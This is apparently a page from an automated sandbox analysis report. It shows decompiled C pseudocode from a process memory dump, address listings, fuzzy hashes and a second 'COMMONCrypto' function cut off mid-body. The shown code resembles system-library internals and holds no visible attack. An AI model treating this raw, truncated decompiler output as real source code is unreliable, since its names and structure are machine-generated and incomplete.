				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x18d1178);
				E0184D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E018C4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0183D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E018C5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x18e60e8;
								if( *0x18e60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x18e60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E01839710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E01836DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0183F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0183F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0183F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0183FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0183FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0183F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0183F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E018C4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0184D130(_t427, _t494, _t511);
				}
			}

0x018c5ba5
0x018c5baa
0x018c5baf
0x018c5bb4
0x018c5bb6
0x018c5bbc
0x018c5bbe
0x018c5bc4
0x018c5bcd
0x018c5bd3
0x018c5bd6
0x018c5bdc
0x018c5be0
0x018c5be3
0x018c5beb
0x018c5bf2
0x018c5bf8
0x018c5bfe
0x018c5c04
0x018c5c0e
0x018c5c18
0x018c5c1f
0x018c5c25
0x018c5c2a
0x018c5c2c
0x018c5c32
0x018c5c3a
0x018c5c3f
0x018c5c42
0x018c5c48
0x018c5c5b
0x018c5c5b
0x018c5c2c
0x018c5cb7
0x018c5cb9
0x018c5cbf
0x018c5cc2
0x018c5cca
0x018c5ccb
0x018c5ccb
0x018c5cd1
0x018c5cd7
0x018c5cda
0x018c5ce1
0x018c5ce4
0x018c5ce7
0x018c5ced
0x018c5cf3
0x018c5cf9
0x018c5cff
0x018c5d08
0x018c5d0a
0x018c5d0e
0x018c5d10
0x00000000
0x00000000
0x018c5d16
0x018c5d1a
0x00000000
0x00000000
0x018c5d20
0x018c5d22
0x018c5d25
0x018c5d2f
0x018c5d2f
0x018c5d33
0x018c5d3d
0x018c5d49
0x018c5d4b
0x00000000
0x00000000
0x018c5d5a
0x018c5d5d
0x018c5d60
0x00000000
0x00000000
0x018c5d66
0x018c5d69
0x00000000
0x00000000
0x018c5d6f
0x018c5d6f
0x018c5d73
0x018c5d79
0x018c5d7f
0x018c5d86
0x018c5d95
0x018c5d98
0x018c5dba
0x018c5dcb
0x018c5dce
0x018c5dd3
0x018c5dd6
0x018c5dd8
0x018c5de6
0x018c5dec
0x018c5dee
0x018c5df1
0x018c5df3
0x018c635a
0x018c635a
0x00000000
0x018c635a
0x018c5dfe
0x018c5e02
0x018c5e05
0x018c5e07
0x018c5e10
0x018c5e13
0x018c5e1b
0x018c5e1c
0x018c5e21
0x018c5e22
0x018c5e23
0x018c5e25
0x018c5e2a
0x018c5e2c
0x018c5e2e
0x018c5e36
0x018c5e39
0x018c5e42
0x018c5e47
0x018c5e4d
0x018c5e54
0x018c5e54
0x018c5e54
0x018c5e2e
0x018c5e5c
0x018c5e5f
0x018c5e62
0x018c5e64
0x018c5e6b
0x018c5e70
0x018c5e7a
0x018c5e7a
0x018c5e7a
0x018c5e6b
0x018c5e7e
0x018c5e7f
0x018c5e7f
0x018c5e81
0x018c5e87
0x018c5e8b
0x018c5e8c
0x018c5e8c
0x018c5e8c
0x018c5e9a
0x018c5e9c
0x018c5ea2
0x018c5ea6
0x018c5f50
0x018c5f50
0x018c5f57
0x018c5f66
0x018c5f66
0x018c5f66
0x018c5f68
0x018c5f6a
0x018c63d0
0x00000000
0x018c5f70
0x018c5f70
0x018c5f91
0x018c5f9c
0x018c5f9e
0x018c5fa4
0x018c5fa6
0x018c638c
0x018c6392
0x018c63a1
0x018c63a7
0x018c63af
0x018c63af
0x018c63bd
0x018c63d8
0x00000000
0x018c63d8
0x018c5fac
0x018c5fb2
0x018c5fb4
0x018c5fbd
0x018c5fc6
0x018c5fce
0x018c5fd4
0x018c5fdc
0x018c5fec
0x018c5fed
0x018c5fee
0x018c5fef
0x018c5ff9
0x018c5ffa
0x018c5ffb
0x018c5ffc
0x018c6000
0x018c6004
0x018c6012
0x018c6012
0x018c6018
0x018c6019
0x018c601a
0x018c601b
0x018c601c
0x018c6020
0x018c6059
0x018c605c
0x018c6061
0x018c6061
0x018c6022
0x018c6022
0x018c6022
0x018c6025
0x018c602a
0x018c602b
0x018c6031
0x018c6037
0x018c6038
0x018c603e
0x018c6048
0x018c6049
0x018c604a
0x018c604b
0x018c604c
0x018c604d
0x018c6053
0x018c6054
0x018c6054
0x018c6062
0x018c6065
0x018c6067
0x018c606a
0x018c6070
0x018c6075
0x018c6076
0x018c6081
0x018c6087
0x018c6095
0x018c6099
0x018c609e
0x018c60a4
0x018c60ae
0x018c60b0
0x018c60b3
0x018c60b6
0x018c60b8
0x018c60ba
0x018c60ba
0x018c60ba
0x018c60ba
0x018c60be
0x018c60c0
0x018c60c5
0x018c60c5
0x018c60c5
0x018c60c6
0x018c60cd
0x018c6114
0x018c60cf
0x018c60cf
0x018c60d4
0x018c60d5
0x018c60da
0x018c60db
0x018c60e1
0x018c60e2
0x018c60e8
0x018c60f8
0x018c60fd
0x018c60fe
0x018c6102
0x018c6104
0x018c6107
0x018c6109
0x018c610b
0x018c610b
0x018c610b
0x018c610b
0x018c610f
0x018c610f
0x018c6117
0x018c611a
0x018c611f
0x018c6125
0x018c6134
0x018c6139
0x018c613f
0x018c6146
0x018c6148
0x018c614b
0x018c614d
0x018c614f
0x018c614f
0x018c614f
0x018c614f
0x018c6153
0x018c6159
0x018c6159
0x018c615c
0x018c6163
0x018c6169
0x018c616c
0x018c6172
0x018c6181
0x018c6186
0x018c6187
0x018c618b
0x018c6191
0x018c6195
0x018c61a3
0x018c61bb
0x018c61c0
0x018c61c3
0x018c61cc
0x018c61d0
0x018c61dc
0x018c61de
0x018c61e1
0x018c61e4
0x018c61e6
0x018c61e8
0x018c61e8
0x018c61e8
0x018c61e8
0x018c61e6
0x018c61ec
0x018c61f3
0x018c6203
0x018c6209
0x018c620a
0x018c6216
0x018c621d
0x018c6227
0x018c6241
0x018c6246
0x018c624c
0x018c6257
0x018c6259
0x018c625c
0x018c625e
0x018c6260
0x018c6260
0x018c6260
0x018c6260
0x018c625e
0x018c6264
0x018c6267
0x018c6269
0x018c6315
0x018c6315
0x018c631b
0x018c631e
0x018c6324
0x018c6327
0x018c632f
0x018c6330
0x018c6333
0x018c633a
0x018c633c
0x018c6335
0x018c6335
0x018c6335
0x018c633f
0x018c6342
0x018c634c
0x018c6352
0x018c6355
0x018c6355
0x018c6359
0x00000000
0x018c626f
0x018c6275
0x018c6275
0x018c6278
0x018c627e
0x018c627e
0x018c6281
0x018c6287
0x018c628d
0x018c6298
0x018c629c
0x018c62a2
0x018c629e
0x018c629e
0x018c629e
0x018c62a7
0x018c62a7
0x018c62aa
0x018c62b0
0x018c62f0
0x018c62f0
0x018c62f2
0x018c62f8
0x018c62fd
0x018c62b2
0x018c62b2
0x018c62b2
0x018c62b5
0x018c62dd
0x018c62e2
0x018c62e5
0x018c62b7
0x018c62b8
0x018c62bb
0x018c62bd
0x018c62c0
0x018c62c4
0x018c62cd
0x018c62cd
0x018c62c0
0x018c62bb
0x018c62b5
0x018c6302
0x018c6303
0x018c6305
0x018c6305
0x018c6305
0x018c630c
0x018c630c
0x00000000
0x018c627e
0x018c6269
0x018c5eac
0x018c5ebb
0x018c5ebe
0x018c5ecb
0x018c5ecb
0x018c5ece
0x018c5ece
0x018c5ed4
0x018c5ed7
0x018c5ed9
0x018c5edb
0x018c5edb
0x018c5ee1
0x018c5ee1
0x018c5ee3
0x018c5f20
0x018c5f20
0x018c5ee5
0x018c5ee5
0x018c5ee5
0x018c5ee8
0x018c5f11
0x018c5f18
0x018c5eea
0x018c5eea
0x018c5eed
0x018c5ef2
0x018c5ef8
0x018c5efb
0x018c5f0a
0x018c5f0a
0x018c5eed
0x018c5ee8
0x018c5f22
0x018c5f28
0x00000000
0x00000000
0x018c5f30
0x018c5f31
0x018c5f37
0x018c5f3a
0x018c5f3d
0x018c5f44
0x00000000
0x00000000
0x00000000
0x018c5f46
0x018c5f48
0x018c5f4d
0x00000000
0x018c5f4d
0x018c5dda
0x018c5ddf
0x00000000
0x018c5ddf
0x018c5dd8
0x018c5da7
0x018c5da9
0x018c5dac
0x018c5dae
0x00000000
0x018c5db4
0x018c5db4
0x00000000
0x018c5db4
0x018c5dae
0x018c5d88
0x018c5d8d
0x018c6363
0x018c6369
0x018c636a
0x018c6370
0x018c6372
0x018c637a
0x018c637b
0x018c637d
0x00000000
0x00000000
0x018c637f
0x018c6385
0x00000000
0x018c6385
0x018c5d38
0x018c5d3b
0x00000000
0x00000000
0x00000000
0x018c5d3b
0x018c5d27
0x018c5d29
0x00000000
0x00000000
0x00000000
0x018c6360
0x00000000
0x018c6360
0x018c5c10
0x018c5c10
0x018c63da
0x018c63e5
0x018c63e5

Memory Dump Source

Source File: 00000008.00000002.344163789.00000000017D0000.00000040.00000001.sdmp, Offset: 017D0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9838f1a3b4330bbd24ec96cc821416e79f7fc28173be7e4016712b3c7ef306c0
Instruction ID: 21342c186a3cfe15d7dc49e1a537c85d6d2e4dda57404694bbce0dd95e3fb9df
Opcode Fuzzy Hash: 9838f1a3b4330bbd24ec96cc821416e79f7fc28173be7e4016712b3c7ef306c0
Instruction Fuzzy Hash: 88422C75A102198FDB24CF68C880BA9BBB1BF45704F1481AED949EB342E774EA85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01814120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E01814120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x18ed360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
